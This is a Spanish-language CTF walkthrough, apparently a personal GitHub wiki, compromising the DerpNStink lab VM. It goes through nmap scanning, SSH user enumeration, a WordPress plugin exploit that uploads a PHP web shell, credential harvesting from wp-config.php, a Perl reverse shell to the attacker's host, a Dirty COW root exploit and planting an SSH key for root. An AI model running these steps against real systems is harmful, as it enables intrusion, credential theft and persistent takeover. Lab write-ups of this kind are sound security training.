Derpstink - danielcastropalomares/security GitHub Wiki
Resultado del nmap:
root@kali:/tmp# nmap -A 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-06 19:52 CET
Nmap scan report for 172.31.255.128
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 08:00:27:7A:11:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Si consultamos el fichero robots.txt:
http://172.31.255.128/robots.txt
User-agent: *
Disallow: /php/
Disallow: /temporary/
Con owasp encontramos un nuevo directorio:
http://172.31.255.128/webnotes/info.txt
<-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live -->
Probamos si existe ese usuario:
msf auxiliary(scanner/ftp/anonymous) > use auxiliary/scanner/ssh/ssh_enumusers
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
msf auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 172.31.255.128
RHOSTS => 172.31.255.128
msf auxiliary(scanner/ssh/ssh_enumusers) > set USERNAME stinky
USERNAME => stinky
msf auxiliary(scanner/ssh/ssh_enumusers) > exploit
[*] 172.31.255.128:22 - SSH - Using malformed packet technique
[*] 172.31.255.128:22 - SSH - Starting scan
[+] 172.31.255.128:22 - SSH - User 'stinky' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Dentro del directorio webnotes encontramos:
http://172.31.255.128/webnotes/
[stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local Domain Name: derpnstink.local Registry Domain ID: 2125161577_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.fakehosting.com Registrar URL: http://www.fakehosting.com Updated Date: 2017-11-12T16:13:16Z Creation Date: 2017-11-12T16:13:16Z Registry Expiry Date: 2017-11-12T16:13:16Z Registrar: fakehosting, LLC Registrar IANA ID: 1337 Registrar Abuse Contact Email: [email protected] Registrar Abuse Contact Phone: Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2017-11-12T16:13:16Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars.
[stinky@DeRPnStiNK: /var/www/html/php]~$ ping derpnstink.local
PING derpnstink.local (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_seq=1 ttl=64 time=0.015 ms
64 bytes from localhost (127.0.0.1): icmp_seq=2 ttl=64 time=0.018 ms
64 bytes from localhost (127.0.0.1): icmp_seq=3 ttl=64 time=0.025 ms
64 bytes from localhost (127.0.0.1): icmp_seq=4 ttl=64 time=0.023 ms
64 bytes from localhost (127.0.0.1): icmp_seq=5 ttl=64 time=0.022 ms
64 bytes from localhost (127.0.0.1): icmp_seq=6 ttl=64 time=0.025 ms
64 bytes from localhost (127.0.0.1): icmp_seq=7 ttl=64 time=0.026 ms
^C --- derpnstink.local ping statistics --- 7 packets transmitted, 7 received, 0% packet loss, time 5998ms rtt min/avg/max/mdev = 0.015/0.022/0.026/0.003 ms
stinky@DeRPnStiNK:~$
Dentro del directorio php, encontramos phpmyadmin:
http://derpnstink.local/php/phpmyadmin
Con map y el script http-enum encontramos mas directorios:
root@kali:~# nmap -sT -T3 -PS80,443,8000,8443,8800 -p 80,443,8000,8443,8080 -script=http-enum 172.31.255.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-09 18:12 CET
Nmap scan report for derpnstink.local (172.31.255.128)
Host is up (0.00054s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum:
| /weblog/: Blog
| /robots.txt: Robots file
|_ /weblog/wp-login.php: Wordpress login page.
443/tcp closed https
8000/tcp closed http-alt
8080/tcp closed http-proxy
8443/tcp closed https-alt
MAC Address: 08:00:27:7A:11:17 (Oracle VirtualBox virtual NIC)
Podemos acceder a la pagina de administración de wordpress con las credenciales admin: admin
http://derpnstink.local/weblog/wp-admin/profile.php
Si realizamos un scan wpscan, vemos que tiene unos cuantos plugins desactulizados:
| [!] 4 vulnerabilities identified:
|
| [!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
| Fixed in: 1.4.7
| References:
| - https://wpvulndb.com/vulnerabilities/7532
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - http://seclists.org/bugtraq/2014/Sep/1
| - http://packetstormsecurity.com/files/131526/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload
|
| [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS)
| Fixed in: 1.5.3.4
| References:
| - https://wpvulndb.com/vulnerabilities/8263
| - http://cinu.pl/research/wp-plugins/mail_5954cbf04cd033877e5415a0c6fba532.html
| - http://blog.cinu.pl/2015/11/php-static-code-analysis-vs-top-1000-wordpress-plugins.html
|
| [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.5
| References:
| - https://wpvulndb.com/vulnerabilities/8786
| - https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_tribulant_slideshow_galleries_wordpress_plugin.html
| - https://plugins.trac.wordpress.org/changeset/1609730/slideshow-gallery
|
| [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)
| Fixed in: 1.6.6
| References:
| - https://wpvulndb.com/vulnerabilities/8795
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17946
| - http://www.defensecode.com/advisories/DC-2017-01-014_WordPress_Tribulant_Slideshow_Gallery_Plugin_Advisory.pdf
| - https://packetstormsecurity.com/files/142079/DC-2017-01-014.pdf
|
Vamos a subir una shell a wordpress:
WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python) | exploits/php/webapps/34681.txt
cd /tmp
wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php
cp /usr/share/exploitdb/exploits/php/webapps/34681.txt /tmp/wp_gallery_slideshow_146_suv.py
python wp_gallery_slideshow_146_suv.py -t http://derpnstink.local/weblog -u admin -p admin -f shell.php
Ahora ya podemos acceder a la shell via web:
http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php
Buscamos ejecutables con permisos de SUID:
p0wny@shell:…/uploads/slideshow-gallery# find / -perm -u=s -type f 2>/dev/null
/bin/mount
/bin/fusermount
/bin/su
/bin/ping6
/bin/umount
/bin/ping
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
Buscamos las credenciales de acceso a la BDD:
p0wny@shell:…/html/weblog# locate wp-config.php
/var/www/html/weblog/wp-config.php
p0wny@shell:…/html/weblog# cat /var/www/html/weblog/wp-config.php | grep DB_*
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mysql');
define('DB_HOST', 'localhost');
define('DB_CHARSET', 'utf8');
define('DB_COLLATE', '');
define('SECURE_AUTH_SALT', '14EV-M=x?/lW3ODB7ro^;}&J4&ggBY#xohsa&7ZX/l[Xp,P;DY;AbPDA4oO#<vKd');
En la configuración de FTP, encontramos al usuario stinky:
cat /etc/vsftpd.userlist
stinky
Ahora vamos a levantar una reverse shell Maquina atacante, ya que con el expect de la shell de PHP no podemos ejecutar el exploit del kernel:
nc -vlp 8080
Maquina victima:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"172.31.255.141:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ahora desde nuestro kali veremos que se ha iniciado la conexión contra el puerto 8080, vamos a utilizar la shell de python:
python -c 'import pty;pty.spawn("/bin/bash")'
Ejecutamos kernelpop-master:
wget https://github.com/spencerdodd/kernelpop/archive/master.zip
unzip master.zip
cd kernelpop-master/
python kernelpop.py
<w/html/weblog/kernelpop-master$ python kernelpop.py
##########################
# welcome to kernelpop #
# #
# let's pop some kernels #
##########################
[*] grabbing distro version and release from underlying OS (linuxubuntu14)
[*] grabbing kernel version from 'uname -a'
[!] could only get the kernel base...may not have accurate matches
[+] kernel (Linux DeRPnStiNK 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 athlon i686 GNU/Linux) identified as:
[base]
type: linux
distro: linuxubuntu14
version: 4.4.0-31
architecture: i686
[!] no specific distro kernel discovered...likelihood of false positives is high
[*] matching kernel to known exploits
[+] discovered 10 possible exploits !
[ base linux kernel vulnerable ](/danielcastropalomares/security/wiki/-base-linux-kernel-vulnerable-)
CVE20177308 `packet_set_ring` in net/packet/af_packet.c can gain privileges via crafted system calls.
CVE20162384 Double free vulnerability in the `snd_usbmidi_create` (requires physical proximity)
CVE20165195_32 Dirty COW race condition root priv esc for 32 bit
CVE20165195_32_poke Dirty COW race condition root priv esc for 32 bit (poke variant)
CVE20173630 Stack clash vuln in solaris
CVE20176074 `dccp_rcv_state_process` in net/dccp/input.c mishandles structs and can lead to local root
CVE201716996 eBPF Verifier check_alu_op() Sign Extension Local Root Exploit
CVE20171000112 ip_ufo_append_data() memory corruption flaw can be exploited to gain root privileges.
CVE20171000367 sudo get_process_ttyname() root priv esc
CVE20171000373 Stack clash vulnerability from qualys
Instalamos la versión de 32 bits:
python kernelpop.py -e CVE20165195_32
Para estabilizar el sistema y copiamos nuestra key ssh:
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCoj4wKvDUX1MpL2ZXXXXXXXXXXXXXXXXXX root@kali" > /root/.ssh/authorized_keys
Ahora ya podemos entrar por ssh con el usuario root:
root@kali:~# ssh [email protected]
Ubuntu 14.04.5 LTS
,~~~~~~~~~~~~~..
' Derrrrrp N `
,~~~~~~, | Stink |
/ , \ ', ________ _,"
/,~|_______\. \/
/~ (__________)
(*) ; (^)(^)':
=; ____ ;
; """" ;=
{"}_ ' '""' ' _{"}
\__/ > < \__/
\ ," ", /
\ " /"
" "=
> <
=" "-
-`. ,'
-
`--'
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
472 packages can be updated.
375 updates are security updates.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
root@DeRPnStiNK:~#